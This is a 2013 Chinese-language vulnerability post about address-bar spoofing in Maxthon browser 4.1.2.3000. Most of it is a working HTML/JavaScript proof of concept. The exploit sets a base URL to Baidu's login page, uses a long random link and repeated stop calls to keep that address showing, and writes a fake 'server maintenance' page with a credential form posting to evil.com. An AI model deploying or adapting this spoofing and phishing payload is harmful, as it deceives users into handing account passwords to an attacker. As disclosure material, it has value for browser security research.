傲游浏览器4.1.2.3000 伪造任意网站内容

浏览： ℃

字体：大中小

发布时间：2013-12-09 23:23:45

来源：

俺也是遨游的老用户了其实 - - 你故意五天忽略漏洞还是在那儿你偷偷修复了……结果还是没照顾到这个问题……Base+A跟直接地址栏打开网址逻辑不一样是为甚……和以前spoof只能spoof不存在的网站不同这个spoof只能spoof已经存在的网站没细看新遨游貌似是修复了不存在的网站耗时过多的问题存在的还是有逻辑问题

<html><base href="https://passport.baidu.com/aclogin.php?queryWord="><div style="display:none"><a href="#" id="ak">asd</a></div><script>document.writeln("<title>Hello World</title>");document.writeln("<h1>伪造网页</h1>");document.writeln("百度服务器维护，在此输入您的帐号密码。 这样写是不是显得危害大一点？ 帐号<form method=post action=http://evil.com/aaa><input type=text/></form> ");var s="W";var i=0;var dd=0;for(i=0;i<30000;i++)s+=('A'+Math.random()*10);document.getElementById("ak").href=s;function x(){if(dd==0){dd=1;document.getElementById("ak").click();}else{document.write("<scr"+"ipt>function e(){window.stop();document.stop();document.writeln('<title>Hello World</title>');document.writeln('<h1>伪造网页</h1>');document.writeln('这个部分是伪造的。你懂得2。');}</scr"+"ipt>");}document.stop();window.stop();window.stop();window.stop();window.stop();document.stop();}setInterval("x();",2130);</script></html>

如果偶尔出411了刷新几次随机数据嘛~

不像以前点击关闭之后地址栏会变回本地路径这儿点击关闭之后地址栏路径就变成 A HREF里面的地址了所以可以SPOOF

当然不点效果也是一样只不过多个圈看起来挺烦人的